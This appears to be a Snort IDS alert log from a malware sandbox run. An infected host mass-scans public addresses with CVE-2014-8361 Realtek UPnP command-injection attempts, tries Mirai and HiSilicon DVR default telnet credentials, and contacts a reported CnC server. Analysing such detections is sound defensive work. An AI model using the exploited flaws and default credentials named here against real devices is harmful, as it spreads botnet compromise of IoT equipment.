Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45460 -> 45.127.162.99:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39308 -> 45.153.166.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39308 -> 45.153.166.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37120 -> 185.235.182.90:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37120 -> 185.235.182.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37172 -> 185.235.182.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39374 -> 45.153.166.212:52869
Source: Traffic	Snort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:45242 -> 77.44.46.237:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:45242 -> 77.44.46.237:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:37800
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40420 -> 91.188.96.229:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40420 -> 91.188.96.229:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40422 -> 91.188.96.229:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44768 -> 91.77.249.46:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44768 -> 91.77.249.46:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60588 -> 91.23.35.11:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60588 -> 91.23.35.11:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44822 -> 91.77.249.46:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60592 -> 91.23.35.11:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34342 -> 45.122.139.223:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34342 -> 45.122.139.223:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:37880 -> 186.220.230.105:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35744 -> 91.77.101.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35744 -> 91.77.101.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60472 -> 45.153.166.65:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60472 -> 45.153.166.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35756 -> 91.77.101.44:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:37880
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36840 -> 45.125.108.158:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36840 -> 45.125.108.158:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38844 -> 45.42.80.28:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38844 -> 45.42.80.28:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60484 -> 45.153.166.65:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47576 -> 45.195.13.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47576 -> 45.195.13.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37048 -> 185.147.58.81:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37048 -> 185.147.58.81:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37054 -> 185.147.58.81:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33828 -> 45.115.239.143:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33828 -> 45.115.239.143:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:48712 -> 223.204.9.175:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49452 -> 45.153.131.189:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49452 -> 45.153.131.189:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58110 -> 45.121.59.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58110 -> 45.121.59.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48836 -> 45.42.87.62:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48836 -> 45.42.87.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49458 -> 45.153.131.189:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34518 -> 45.120.78.14:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34518 -> 45.120.78.14:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:38030
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34520 -> 45.120.78.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46210 -> 45.42.43.229:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46210 -> 45.42.43.229:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37378 -> 45.126.229.176:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37378 -> 45.126.229.176:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46214 -> 45.42.43.229:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55502 -> 91.200.123.7:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56846 -> 45.122.133.186:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56846 -> 45.122.133.186:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40732 -> 45.121.83.0:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40732 -> 45.121.83.0:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48696 -> 45.120.108.100:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48696 -> 45.120.108.100:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 61.8.67.30:23 -> 192.168.2.23:55058
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:38092
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48708 -> 45.120.108.100:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 66.210.126.228:23 -> 192.168.2.23:33242
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 66.210.126.228:23 -> 192.168.2.23:33242
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 218.161.54.12:23 -> 192.168.2.23:44418
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 218.161.54.12:23 -> 192.168.2.23:44418
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51400 -> 185.154.168.99:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51400 -> 185.154.168.99:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51402 -> 185.154.168.99:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52030 -> 185.245.0.34:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52030 -> 185.245.0.34:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55470 -> 45.133.119.246:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55470 -> 45.133.119.246:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57120 -> 45.158.20.50:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57120 -> 45.158.20.50:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:38178
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43744 -> 45.158.21.49:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43744 -> 45.158.21.49:52869
Source: Traffic	Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.23:39970 -> 41.235.58.200:37215
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50148 -> 45.42.86.142:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50148 -> 45.42.86.142:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45964 -> 45.42.80.75:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45964 -> 45.42.80.75:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48484 -> 45.91.83.239:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48484 -> 45.91.83.239:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43574 -> 91.188.117.143:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43574 -> 91.188.117.143:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42444 -> 91.77.127.33:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42444 -> 91.77.127.33:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43576 -> 91.188.117.143:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42494 -> 91.77.127.33:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 186.220.230.105:23 -> 192.168.2.23:38244
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47358 -> 185.225.195.147:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47358 -> 185.225.195.147:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47374 -> 185.225.195.147:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56272 -> 45.158.20.135:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56272 -> 45.158.20.135:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43076 -> 45.33.254.245:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43076 -> 45.33.254.245:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57858 -> 45.41.81.247:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57858 -> 45.41.81.247:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43774 -> 45.123.198.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43774 -> 45.123.198.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51716 -> 45.152.216.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51716 -> 45.152.216.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53846 -> 45.60.186.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53846 -> 45.60.186.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53850 -> 45.60.186.42:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 66.210.126.228:23 -> 192.168.2.23:33536
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 66.210.126.228:23 -> 192.168.2.23:33536
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56004 -> 91.78.47.190:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56004 -> 91.78.47.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56008 -> 91.78.47.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43054 -> 185.235.182.113:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43054 -> 185.235.182.113:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43062 -> 185.235.182.113:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44208 -> 91.225.11.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44208 -> 91.225.11.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44216 -> 91.225.11.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56478 -> 45.126.79.119:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56478 -> 45.126.79.119:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44830 -> 45.33.247.232:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44830 -> 45.33.247.232:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45216 -> 91.200.122.109:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 218.161.54.12:23 -> 192.168.2.23:44742
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 218.161.54.12:23 -> 192.168.2.23:44742
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 114.26.113.229:23 -> 192.168.2.23:35538
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 114.26.113.229:23 -> 192.168.2.23:35538
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51054 -> 91.77.243.246:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51054 -> 91.77.243.246:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41840 -> 45.121.59.95:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41840 -> 45.121.59.95:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58998 -> 185.71.65.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58998 -> 185.71.65.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51056 -> 91.77.243.246:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59034 -> 185.71.65.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60544 -> 91.77.152.225:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60544 -> 91.77.152.225:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49808 -> 185.241.253.136:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49808 -> 185.241.253.136:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54538 -> 91.79.21.58:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54538 -> 91.79.21.58:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49812 -> 185.241.253.136:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52842 -> 91.77.135.253:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52842 -> 91.77.135.253:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54544 -> 91.79.21.58:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52846 -> 91.77.135.253:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60546 -> 91.77.152.225:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34416 -> 45.42.91.177:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34416 -> 45.42.91.177:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60230 -> 91.78.18.165:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60230 -> 91.78.18.165:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60234 -> 91.78.18.165:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35878 -> 185.237.157.175:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35878 -> 185.237.157.175:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35882 -> 185.237.157.175:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 200.59.81.250:23 -> 192.168.2.23:54562
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44658 -> 91.77.200.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44658 -> 91.77.200.60:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44662 -> 91.77.200.60:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51004 -> 45.33.242.238:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51004 -> 45.33.242.238:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54218 -> 45.121.57.152:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54218 -> 45.121.57.152:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 201.211.209.224:23 -> 192.168.2.23:38964
